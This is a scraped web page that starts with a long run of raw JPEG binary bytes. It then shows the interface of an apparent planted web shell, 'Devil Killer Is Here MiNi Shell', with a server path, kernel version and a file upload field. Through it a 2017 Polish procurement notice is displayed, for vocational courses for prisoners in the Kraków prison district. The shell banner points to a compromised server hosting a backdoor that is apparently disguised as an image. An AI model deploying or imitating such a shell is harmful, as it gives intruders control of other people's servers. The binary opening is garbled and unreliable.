JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170306/37166-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.zp.sw.gov.pl' target='_blank'>http://www.zp.sw.gov.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 37166 - 2017
              z dnia 2017-03-06 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Kraków: Przeprowadzanie kursów zawodowych w 2017 roku, dla osadzonych przebywających w jedenastu jednostkach okręgu krakowskiego w ramach projektu pn. Podniesienie kwalifikacji zawodowych więźniów w celi ich powrotu na rynek pracy po zakończeniu odbywania kary pozbawienia wolności realizowany w ramach Działania 2.7 Zwiększenie szans na zatrudnienie osób szczególnie zagrożonych wykluczeniem społecznym Programu Operacyjnego Wiedza Edukacja Rozwój 2014-2020.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Program Operacyjny Wiedza Edukacja Rozwój 2014 - 2020</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                tak
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br />30</div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Okręgowy Inspektorat Służby Więziennej w Krakowie, krajowy numer identyfikacyjny
              35114184600000, ul.
              ul. Montelupich 
              7,
              31155  
              Kraków, woj.
              małopolskie, państwo
              Polska, tel.
              12 634 50 77, e-mail
              mariusz.michalik@sw.gov.pl, faks
              12 633 81 72.
              <br />
              Adres strony internetowej (URL): www.zp.sw.gov.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Państwowa jednostka organizacyjna nie posiadaąca osobowości prawnej</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.zp.sw.gov.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />za pośrednictwem poczty lub posłańca<br />
                Adres:
                <br />31-155 Kraków, ul. Montelupich 7</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Przeprowadzanie kursów zawodowych w 2017 roku, dla osadzonych przebywających w jedenastu jednostkach okręgu krakowskiego w ramach projektu pn. Podniesienie kwalifikacji zawodowych więźniów w celi ich powrotu na rynek pracy po zakończeniu odbywania kary pozbawienia wolności realizowany w ramach Działania 2.7 Zwiększenie szans na zatrudnienie osób szczególnie zagrożonych wykluczeniem społecznym Programu Operacyjnego Wiedza Edukacja Rozwój 2014-2020.<br /><b>Numer referencyjny: </b>OI.POWER.2230.1.2017 KR<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Szkolenie przewidziane jest łącznie dla max. 830 osób: 71 grup szkoleniowych  11 grup po 10 osób, 60 grup po 12 osób. 
Czas trwania każdego cyklu szkoleniowego (kursu) winien wynosić przeciętnie od 180 do 210 godzin dydaktycznych.  Określenie innego czasu trwania kursu wymaga pisemnej zgody Zamawiającego. Cykl szkoleniowy winien zostać zrealizowany w okresie do 40 dni od dnia jego rozpoczęcia. Zajęcia powinny odbywać się od poniedziałku do piątku w godzinach od 8.00 do 16.30 (zróżnicowane w zależności od jednostki). W sytuacjach wyjątkowych, za zgodą Dyrektora jednostki penitencjarnej, zajęcia mogą odbywać się również w soboty.   
Miejsce przeprowadzenia zajęć   pomieszczenia lekcyjne  i teren do zajęć praktycznych jednostek podległych Okręgowemu Inspektoratu Służby Więziennej w Krakowie.
Zakres szkoleń:

a) 2 kursy zawodowe asystent osoby niepełnosprawnej, opiekun osoby starszej ( 341201, 341202 - kod zawodu według rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 7 sierpnia 2014 r. w sprawie klasyfikacji zawodów i specjalności na potrzeby rynku pracy oraz zakresu jej stosowania, Dz. U. poz. 1145 z późń. zm., zwanego dalej Min. P. i P.S.) przeprowadzone w: ZK Kraków Nowa Huta  1 kurs, ZK Pińczów  1 kurs;
b) 23 kursy zawodowe brukarz (711205 - kod zawodu Min. P. i P.S.) przeprowadzone w: AŚ Kraków  2 kursy, AŚ Kielce - 1 kurs, AŚ Kraków Podgórze  2 kursy, ZK Kraków Nowa Huta  2 kursy, ZK Nowy Sącz  2 kursy, ZK Nowy Wiśnicz  3 kursy, ZK Pińczów  2 kursy, ZK Tarnów  2 kursy, ZK Tarnów Mościce  3 kursy, ZK Trzebinia  3 kursy, ZK Wadowice  1 kurs.
c) 1 kurs zawodowy elektryk zakończony egzaminem i uzyskaniem uprawnień SEP do 1 kV (741103 - kod zawodu Min. P. i P.S.) przeprowadzony w Zakładzie Karnym w Tarnowie;
d) 1 kurs zawodowy krawiec (753105 - kod zawodu Min. P. i P.S.) przeprowadzony w ZK Kraków Nowa Huta;
e) 1 kurs zawodowy kucharz (512001 - kod zawodu Min. P. i P.S.) przeprowadzony w ZK Pińczów;
f) 1 kurs zawodowy malarz budowlany (713102 - kod zawodu Min. P. i P.S.) przeprowadzony w ZK Pińczów;
g) 2 kursy zawodowe monter izolacji budowlanych (712401 - kod zawodu Min. P. i P.S.) przeprowadzone w ZK Tarnów Mościce  2 kursy;
h) 2 kursy zawodowe monter stolarki budowlanej (712906 - kod zawodu Min. P. i P.S.) przeprowadzone w ZK Pińczów  2 kursy;
i) 5 kursów zawodowych ogrodnik terenów zieleni (611306 - kod zawodu Min. P. i P.S.) przeprowadzone w: AŚ Kielce - 2 kursy, AŚ Kraków Podgórze  1 kurs, ZK Nowy Wiśnicz  2 kursy;
j) 1 kurs zawodowy pilarz (817210 - kod zawodu Min. P. i P.S.) przeprowadzony w ZK Tarnów;
k) 5 kursów zawodowych spawacz metodą MIG zakończony egzaminem i uzyskaniem uprawnień spawacza (721204 - kod zawodu Min. P. i P.S.) przeprowadzane: w  ZK Nowy Sącz  2 kursy, ZK Trzebinia  1 kurs, ZK Wadowice  2 kursy;
l) 2 kursy zawodowe stolarz (752205 - kod zawodu Min. P. i P.S.) przeprowadzone w: ZK Tarnów Mościce  1 kurs, ZK Trzebinia  1 kurs;
ł) 1 kurs zawodowy ślusarz (722204 - kod zawodu Min. P. i P.S.) przeprowadzony w ZK Tarnów;
m) 23 kursy zawodowe technolog robót wykończeniowych w budownictwie (712904 - kod zawodu Min. P. i P.S.) przeprowadzone w: AŚ Kraków  1 kurs, AŚ Kielce  4 kursy, AŚ Kraków Podgórze  1 kurs, ZK Kraków Nowa Huta  3 kursy, ZK Nowy Sącz  3 kursy, ZK Nowy Wiśnicz  1 kurs, ZK Pińczów- 1 kurs, ZK Tarnów  2 kursy, ZK Tarnów Mościce  1 kurs, ZK Trzebinia  2 kursy, ZK Wadowice  4 kursy,
n) 1 kurs zawodowy tynkarz (712303712904 - kod zawodu Min. P. i P.S.) przeprowadzony w ZK Nowy Wiśnicz.
<br /><br /><b>II.5) Główny kod CPV: </b>80530000-8<br /><b> Dodatkowe kody CPV:</b>80562000-1<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 67 ust. 1 pkt 6 ustawy. Zamówienia te będą powtórzeniem usług polegających na zrealizowaniu, w jedenastu jednostkach Okręgu krakowskiego, dodatkowych cykli szkolenia zawodowego skazanych w ilości do 2 na jednostkę (AŚ/ZK) tj. łącznie 22, na warunkach określonych w SIWZ niniejszego zamówienia. Termin realizacji dodatkowych cykli szkoleniowych skazanych  do 30.04.2018 r.<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 08/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Wykonawca winien być podmiotem uprawnionym do prowadzenia zawodowego kształcenia kursowego, zgodnie z wymaganiami określonymi w Rozporządzeniu Ministra Edukacji Narodowej z dnia  11 stycznia 2012 roku  w sprawie kształcenia ustawicznego w formach pozaszkolnych (t. j. Dz. U. z 2014. poz. 622 )<br />
                Informacje dodatkowe
                W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej - Wykonawca spełni warunek jeśli przedstawi dokument potwierdzający, że jest podmiotem uprawnionym do prowadzenia zawodowego kształcenia kursowego, zgodnie z wymaganiami określonymi w Rozporządzeniu Ministra Edukacji Narodowej z dnia  11 stycznia 2012 roku  w sprawie kształcenia ustawicznego w formach pozaszkolnych (t. j. Dz. U. z 2014. poz. 622 )<br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Wykonawca winien być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną w wysokości nie niższej niż 100 000 zł (słownie: sto tysięcy 00/100 zł.)<br />
                Informacje dodatkowe
                W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących sytuacji ekonomicznej lub finansowej -  Wykonawca spełni warunek jeśli przedstawi dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną w wysokości nie niższą niż 100 000 zł (słownie: sto tysięcy 00/100 zł.).<br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca winien wykazać się wykonaniem  w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej:
a.	w przypadku złożenia ofert na zadania w ilości od 1 do 4  co najmniej 20  szkoleń zawodowych osób dorosłych w formach pozaszkolnych dla nie mniej niż łącznie 200 osób;
b.	w przypadku złożenia ofert na zadania  w ilości od 5 do 8  co najmniej 40 szkoleń zawodowych osób dorosłych w formach pozaszkolnych dla nie mniej niż łącznie 400 osób;
c.	w przypadku złożenia ofert na zadania w ilości od 9  11  co najmniej 60 szkoleń zawodowych osób dorosłych w formach pozaszkolnych dla  nie mniej niż łącznie 600 osób .
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej - Wykonawca spełni warunek jeżeli wykaże się wykonaniem  w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, że należycie wykonał (przeprowadził) co najmniej:
a.	w przypadku złożenia ofert na zadania w ilości od 1 do 4  co najmniej 20  szkoleń zawodowych osób dorosłych w formach pozaszkolnych dla nie mniej niż łącznie 200 osób;
b.	w przypadku złożenia ofert na zadania  w ilości od 5 do 8  co najmniej 40 szkoleń zawodowych osób dorosłych w formach pozaszkolnych dla nie mniej niż łącznie 400 osób;
c.	w przypadku złożenia ofert na zadania w ilości od 9  11  co najmniej 60 szkoleń zawodowych osób dorosłych w formach pozaszkolnych dla  nie mniej niż łącznie 600 osób .
Za 1 szkolenie zawodowe osób dorosłych w formach pozaszkolnych rozumie się realizację usługi (kursu) w ramach jednej grupy szkoleniowej na podstawie umowy  wykonanej zgodnie z rozporządzeniem Ministra Edukacji Narodowej  z dnia 11 stycznia 2012 roku w sprawie kształcenia ustawicznego w formach pozaszkolnych , (Dz. U.  z 2014 r. , poz. 622) o wartości co najmniej 15 000,00 zł brutto. Jeżeli umowa dotyczyła przeszkolenia większej liczby grup kursantów za liczbę szkoleń zawodowych należy przyjąć liczbę przeszkolonych grup. 
Do wykazu zrealizowanych usług szkoleniowych (załącznik nr 5 do SIWZ) należy dołączyć dowody określające czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu. 
</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1.	W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu Zamawiający żąda:
1)	informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 13, 14 i 21 ustawy  wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
2)	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
3)	zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz 
z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej - Wykonawca spełni warunek jeśli przedstawi dokument potwierdzający, że jest podmiotem uprawnionym do prowadzenia zawodowego kształcenia kursowego, zgodnie z wymaganiami określonymi w Rozporządzeniu Ministra Edukacji Narodowej z dnia  11 stycznia 2012 roku  w sprawie kształcenia ustawicznego w formach pozaszkolnych (t. j. Dz. U. z 2014. poz. 622).<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. Dokumenty potwierdzające liczbę zatrudnionych osób pozbawionych wolności lub zwalnianych z zakładów karnych o których mowa w ustawie z dnia 6 czerwca 1997 r.  Kodeks karny wykonawczy (Dz. U. poz. 557, z późn. zm.), mających trudności w integracji ze środowiskiem  aktualne na dzień składania ofert.
2.Pełnomocnictwo do reprezentowania Wykonawcy w niniejszym postępowaniu oraz do podpisania umowy (o ile nie wynika z dokumentów rejestracyjnych). Pełnomocnictwo musi mieć formę pisemną i musi być podpisane przez osoby uprawnione do reprezentowania Wykonawcy (podpisy i pieczęcie oryginalne) lub mieć postać aktu notarialnego, albo notarialnie potwierdzonej kopii.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1. Na podstawie art.45 ust.1 zamawiający żąda wniesienia wadium:
- zadanie 1 w wysokości 3 000,00 zł (słownie: trzy tysiące 00/100 złotych),
